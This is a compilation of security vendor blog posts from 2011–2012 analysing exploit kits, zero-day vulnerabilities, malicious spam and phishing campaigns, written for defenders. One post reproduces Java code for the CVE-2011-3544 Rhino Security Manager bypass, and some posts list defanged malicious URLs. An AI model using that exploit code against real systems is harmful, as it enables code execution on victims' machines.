M86 Security Labs Blog

MIDI Files – Mid-Way to Infection

By Arseny Levin • January 31st, 2012 • Vulnerabilities

Microsoft’s January patch MS12-004 addressed a few vulnerabilities in Windows Media components. One particular issue, CVE-2012-0003, can be exploited via Windows Media Player ActiveX, as it leverages a heap overflow occurring in ‘midiOutPlayNextPolyEvent’ function within the Windows Multimedia Library, winmm.dll. The bad guys didn’t waste time and this vulnerability is now exploited in the wild as reported by Trend Micro. A Web page hosted on a South Korean site loads a maliciously crafted MIDI file and sprays the heap. The attacker utilizes the exploitation method presented in Nicolas Joly’s blog from VUPEN. The attack allocates an HTML element of a specific size and eventually overwrites some of its data, and thus achieves malicious code execution.

The author of this page used a Korean JavaScript obfuscator in order to obfuscate a large block of code which hides the shellcode, as can be seen in the following code snippet. In particular, the obfuscated code, generated by this tool, changes itself several times during execution.

The code also ensures that it is being executed only in Internet Explorer because that’s the only browser where this exploitation will be successful. After de-obfuscating the JavaScript code, we can analyze the shellcode itself. The author uses a common evading technique: XOR encryption, with a decrypting loop at the prologue. This technique is usually very effective against signature based detection engines.

Then the shellcode imports and calls URLDownloadToFileA to download the payload which is a packed executable, saving it with an ambiguous name such as “a.exe”.

The executable is a downloader which fetches additional malware with rootkit capabilities. The author of the attack did a decent job obfuscating the executable file, as can be seen by a Virustotal analysis:

All M86 Secure Web Gateway customers are protected from this attack by default without need to install any security update.

Massive Compromise of WordPress-based Sites but ‘Everything will be Fine’

By Daniel Chechik • January 30th, 2012 • Cybercrime Malware

A few days ago, hundreds of websites, based on WordPress 3.2.1, were compromised. The attacker uploaded an HTML page to the standard Uploads folder and that page redirects the user to the Phoenix Exploit Kit. Its logs show that users from at least four hundred compromised sites were redirected to Phoenix exploit pages. Here is a partial list of those websites:

: Partial list of compromised WordPress websites

The content uploaded by the attacker is not part of the home page and will not show when users browse these websites. In fact, accessing any page on these compromised WordPress sites, other than the uploaded page, will not infect the user’s machine. The general motivation of attackers to compromise websites is mainly to bypass URL reputation mechanisms, spam filters and certain security policies.
In order to lure users to these pages, the attacker sent thousands of malicious emails querying an unfamiliar bill and asking recipients to click on a link as described by Websense blog. The link points to the aforementioned uploaded page.

The malicious uploaded page

The page is obfuscated and adds a hidden IFRAME that leads to the Phoenix Exploit Kit:

The exploit page is hosted in a Russian domain called horoshovsebudet which roughly translates as “Everything will be fine”, showing a certain sense of humor by these attackers.
The Phoenix Exploit Kit identifies the User Agent of the client machine and delivers a customized exploit Web page. The following obfuscated page was served when accessing with Internet Explorer 6:

The obfuscated Phoenix exploit page

The obfuscated page above generates code which attempts exploiting multiple vulnerabilities in Microsoft Internet Explorer, Adobe PDF, Flash and Oracle Java as described in the Phoenix Exploit Kit blog. Among those exploits is the latest Java Rhino vulnerability as shown in the following screenshot and taken from the original malicious server.

Statistics on Phoenix Exploit Kit control panel

Note the successful exploitation rate of the Java Rhino vulnerability and of the PDF Libtiff vulnerability. Even the MDAC vulnerability is successfully exploited which is surprising given that it only exists in the old version 6 of Internet Explorer.

Interestingly enough, the “Browser statistics” chart in the screen shot above shows that none of the victims used Google Chrome. Taking a closer look at the source code of the Phoenix Exploit Kit reveals that Chrome browser is explicitly excluded, for no obvious reason:

: Phoenix Exploit Kit source code

All M86 Secure Web Gateway customers are protected against this attack by default. The access to the exploit page is blocked.

As usual, stay safe and be careful not to click links in suspicious emails.

Tags: compromised websites | Java Rhino | Phoenix exploit kit 3.0 | Phoenix Exploit Kit source code | Wordpress

Zbot Trojan spreads through fake ConEdison billing notification email

By Rodel Mendrez • January 13th, 2012 • Spam

Today we came across a new malicious spam campaign that is actively sent out by the Cutwail spam botnet. The suspicious email claims to be a bill summary from the New York-based energy company Con Edison, Inc. It may use the subject line “ConEdison Billing Summary as of <DATE>” and the attachment uses the filename format Billing-Summary-ConEdison-<random numbers>-<Date>.zip.

The attached zip file contains an executable file, which unsurprisingly is a Zbot malware variant. When extracted, the malicious executable uses no disguise. It uses no fake icons of Adobe Reader or Microsft Word, no double file extensions, or excessive use of space in the file name to hide the .EXE extension. The attached file is so dull that average users should easily spot that the file is suspicious.

The good news is that when this particular Zbot sample was run, it failed to communicate to its command and control (CnC) server at plantlunch[dot]ru which turns out to be currently offline.

In conclusion, bill notifications do not usually arrive with an executable file so emails like this should be treated with extreme suspicion. When you see these obvious signs of malware, just stop and delete the email. M86 MailMarshal customers were protected against this campaign from the moment it began.

Web Hijacks with AJAX

By Moshe Basanchig • January 3rd, 2012 • Malware

Malware authors always seem to closely monitor trends in Web security development in order to create a variety of browser-based attacks. Just to name a few, techniques such as code obfuscation, plug-in detection and affiliate management are often used.

This is why we, at M86 Security, weren’t surprised to see a malicious site which loads parts of its attack using AJAX (Asynchronous JavaScript and XML), a method for client-side code to asynchronously exchange data with web servers. The following attack was observed on a currently running server located in China, which is serving malware. So how does this work?

First, there’s a web-page, containing JavaScript code that fetches the other parts of the attack:

This code is very similar to code commonly used in so many web pages nowadays. The main difference is the extra parameters it accepts, which are used to “cut” certain parts from the accepted content, so it could be processed and executed as code later on.

Next, the returned code is used by the exploit. In this case, the code is shellcode:

It’s simple. Using the exact same technique, this web page can load various browser or plugin exploit attempts. In this specific case, the page loads a SWF file exploiting CVE-2010-1297. Other pages on this server are exploiting CVE-2010-0806 and CVE-2010-0249.

The main reason that malware authors use AJAX is the ability to write generic attack pages which look benign and become malicious only once the dynamic content is loaded. This provides an advantage which is also very useful for evading AV detection, since tiny bits of the attack can be loaded one at a time, thus making it very difficult to provide a signature.

Needless to say, M86 SWG customers are protected from such exploitation attempts.

Prevalent Exploit Kits Updated with a New Java Exploit

By Daniel Chechik • December 16th, 2011 • Cybercrime Malware Vulnerabilities

Until recently, most of the vulnerabilities exploited by popular exploit kits were found last year or even earlier. Moreover, it would take authors at least a month to update their kits with the new exploits that had been discovered in the wild. However, in the past few weeks, authors released an updated version of their kits with a new recent exploit before a patch had been released.

First, a new version of the Blackhole exploit kit was released, version 1.2.1:

: Live Blackhole Exploit Kit control panel

The Blackhole exploit kit presented above was modified to exploit clients that have Java installed, using the recently discovered CVE-2011-3544 vulnerability. This is the only vulnerability that is actually being exploited.
A few days later, a new version of Phoenix exploit kit 3.0 was released, just a few weeks after the release of its predecessor, Phoenix 2.9.

Live Phoenix Exploit Kit 3.0 control panel

Notice the red boxes in the screen shots above: A new exploit was added to those exploit kits, which is the reason for the upgrade.

A few weeks ago Michael ‘mihi’ Schierl described a design error in Java. Basically this vulnerability is similar to other Java vulnerabilities where an untrusted code is executed in elevated privileges. Rhino is a Javascript engine that runs under the JVM and can interact with Java applets. An attacker can bypass the scripting engine protection by generating an error object, using Rhino script, which runs in elevated privileges and executing code that disables the Security Manager. Once the Security Manager is disabled, the attacker can execute code with full permissions.

Not long after the discovery, an exploit module was published in Metasploit. First, the code binds a Rhino object with the applet:

import javax.script.*;
…
ScriptEngine engine = new ScriptEngineManager().getEngineByName(“js”);
Bindings b = engine.createBindings();
b.put(“applet”, this);

The Java code executes a script that bypasses the Security Manager protection by using the “toString” method inside a script context:

Object proxy = (Object) engine.eval(
“this.toString = function() {” +
“                      java.lang.System.setSecurityManager(null);” +
“                      applet.callBack();” +
“                      return String.fromCharCode(97 + Math.round(Math.random() * 25));”+
“};” +
“e = new Error();” +
“e.message = this;” +
“e”, b);

The script throws an exception, and the rest of the code would be executed.

catch (ScriptException e) {
e.printStackTrace();
}

The vulnerability is cross-platform and doesn’t require heap spray or buffer overflow techniques. That makes it very effective and therefore authors of exploit kits rushed to add it to their kits. The concerning aspect is that the Blackhole exploit kit was updated even before a patch was released by the vendor.

Customers of all versions of M86 Secure Web Gateway are safe, as it provides zero-day protection against this vulnerability by default.

We highly encourage users to keep their Java updated, or remove it if it is not needed. A patch for this Java vulnerability is available by now: Look for Java 6 Update 29, or Java 7 Update 1.

A new Adobe 0-day In the Wild – – But No Worries, You are Already Protected with Our Secure Web Gateway!

By Anat Davidi • December 7th, 2011 • Vulnerabilities

Yesterday Adobe released an advisory for a vulnerability in the Adobe Reader and Adobe Acrobat products. The vulnerability, titled ‘U3D Memory Corruption Vulnerability’ was part of a targeted attack and discovered by Lockheed Martin’s Computer Incident Response Team. This is not the first time a targeted attack has been aimed at the US defense industry.

This attack involves embedding a maliciously crafted Universal 3D (U3D) stream in a PDF file, one of several examples of attacks on embedded streams within PDF files, and represents a growing attack vector due to its ability to deal with defense mechanisms among which DEP and ASLR (two techniques meant to help prevent unauthorized code execution) using known techniques such as JIT Spraying.

According to Adobe’s blog post released alongside the advisory, Adobe is planning to release an update for Adobe Reader 9, the version targeted by this vulnerability, “no later than the week of December 12, 2011″. The rest of its supported versions will receive updates as part of their quarterly updates in January 2012.

M86 Secure Web Gateway, version 9.2 and above, provides zero-day protection against this attack, without requiring any further updates. Customers who wish to monitor the attack in their organization may look for attacks that are tagged with the “Adobe Universal 3D streams” block message.

We’re proud that our proactive rules block this new zero-day exploit and we’ll continue to work hard to provide this level of protection to our customers in the future.

Tags: 0day | Acrobat Reader | Adobe | CVE-2011-2462 | exploit | PDF | SWG

Cutwail Spam Campaigns Lure Users to Blackhole Exploit Kit

By Rodel Mendrez • December 1st, 2011 • Spam

Over the past few days the Cutwail botnet has been sending out malicious spam campaigns with a variety of themes such as airline ticket orders, Automated Clearing House (ACH), Facebook notification, and scanned document. These campaigns do not have malware attachments, instead the payload is delivered via links to malicious code hosted on the web.

The subject lines used in the Facebook spam campaign are similar to those in the image below. Notice that they use varying letter case and random Facebook profile names.

The message body may look like a legitimate Facebook notification. However, further inspection reveals the underlying link redirecting to a malicious webpage.

Another campaign spammed out by Cutwail claims to be a flight ticket order. The spam can be easily spotted by its subject lines. It looks seemingly like a “forwarded” or “reply” email and uses the subject format shown in the image below.

Here is an example of the message:

There are two things you should notice about this particular spam campaign. Firstly, the visible URL shown does not conform to the URI naming scheme of not having a top level domain, a clumsy mistake from the spammers. Other similar messages use “www.airlines.com” which is a parked domain. Secondly, “Airlines America” in the signature block is not a real airline company unless the spammers meant to imply American Airlines.

Two other spam campaigns resurfaced this week, namely the “Automated Clearing House (ACH)” and the “scanned document”.

The URL link in these campaigns points to a compromised web server that serves a small HTML file. The HTML file then contains a malicious iframe that opens up a Blackhole exploit kit landing page. This is the same exploit kit used in previous spam campaigns such as the Steve Jobs is Alive and fake LinkedIn notifications.

If you are a system administrator, you may want to block the following exploit kit landing pages.

crredret[dot]ru/main.php
www[dot]btredret[dot]ru/main.php
bqredret[dot]ru/main.php

At the time of analysis, loading the exploit kit webpage downloaded SpyEye and the Bobax spambot on to our vulnerable hosts.

TrueType but not Truly Safe: The New Zero-Day Event

By Ziv Mador • November 8th, 2011 • Vulnerabilities

A new vulnerability in Windows, CVE -2011-3402, has been
recently identified and is already exploited in the wild. For now, only a
handful of targeted attacks have been found. The vulnerability exists in
Windows TrueType Font Parsing Engine and affects most Windows versions,
including Windows 7. An attack involves a file which has a maliciously crafted
TrueType font file (TTF) embedded in it. There are several file formats that
use TrueType fonts, for example, file formats of Microsoft Office and Adobe
Acrobat Reader. In the currently known targeted attacks, a Microsoft Word
document was used. Once rendered on a vulnerable system, parsing the TTF file
may end up with execution of malicious code. Microsoft has released an advisory
for this issue and also released a FixIt tool as a workaround. It disables access
to the system file T2embed.dll in order to avoid TrueType font processing.
However, a word of caution: Applications that use these fonts may break after
this workaround is deployed.

In the known attacks, the installed malware is known as Duqu.
The Laboratory of Cryptography and System Security (CrySyS) at Budapest University
first reported these attacks and they were thoroughly investigated by that team
and by Symantec in the following article.

M86 Security Secure Web Gateway (SWG) can be deployed with
three possible antivirus scanners and they already released protection: Kaspersky,
McAfee and Sophos. No additional Security Update by M86 Security is required. In addition, we are
investigating adding more layers of protection in the future. Keep in mind,
these attacks currently are not delivered via web browser but that can obviously change
in the future.

We will continue to monitor the situation and update this blog post as necessary.

“Steve Jobs Alive!” Spam Campaign Leads To Exploit Page

By Rodel Mendrez • October 7th, 2011 • Spam Vulnerabilities

It was a sad day in the technology industry with the recent passing of Apple’s legendary leader, Steve Jobs. Unfortunately, the cyber-criminals see this as an opportunity. Today, we started seeing a Steve Jobs spam campaign, with the subject suggesting that he is still alive.

Steve Jobs Alive!

Steve Jobs Not Dead!

Steve Jobs: Not Dead Yet!

Is Steve Jobs Really Dead?

Sample of the Steve Jobs spam campaign

The URL links in the spam are many and varied. The websites that they point to all look to be hacked by the addition of obfuscated code that, after two layers of redirects, ultimately ends up at a BlackHole exploit kit landing page.

The HTML source code of the Blackhole Exploit kit landing page

The intermediary redirect URLs are random-looking domains, with a top level domain of .ms (Monserrat in case you didn’t know), here are some examples:

hxxp://xnyiinobfb[dot]ce[dot]ms/index.php
hxxp://derhvbq[dot]ce[dot]ms/index.php

The purpose of the exploit kit is to try and exploit vulnerabilities on the system and eventually download malicious executable files. At this stage, we are not sure what the ultimate payload is, as no files were actually downloaded on our test system.

Unfortunately, many people may find this spam campaign “click-worthy” given the icon that Steve Jobs was. The usual advice applies – avoid clicking links in unsolicited email. In this case, one simple click is all it takes to get compromised.

New Google AdWords Phish In-the-wild

By Rodel Mendrez • October 4th, 2011 • Phishing

For those of you who have a Google AdWords account, be wary of a new Google AdWords spam campaign we have seen in-the-wild earlier this week. The spam email may use the following subject lines:

Google AdWords: You have a new alert.

Google Team: You have a new alert

Here is an example of the spam email posing as a notification email from Google AdWords.

If you notice in the sample email, the URL link that appears to be linking to your Adwords account looks dodgy. But if that obvious sign didn’t prevent you from clicking the link, you would have been redirected to a Google AdWords phishing webpage.

After entering a username and password, the webpage sends these credentials to the cyber-criminal’s webserver.

The HTTP POST request when the user enters their Google account credentials. It sends the username and password to the phisher's webpage.

Of course, once you enter your Google account credentials in the phishing page this will NOT just compromise your Google AdWords account but all your Google services like GMail or Google+ will be affected as well. When you receive these sorts of notification emails, always double check the URL before you click on them – if it looks suspicious, it probably is.

Tags: Google AdWords | Phishing | Spam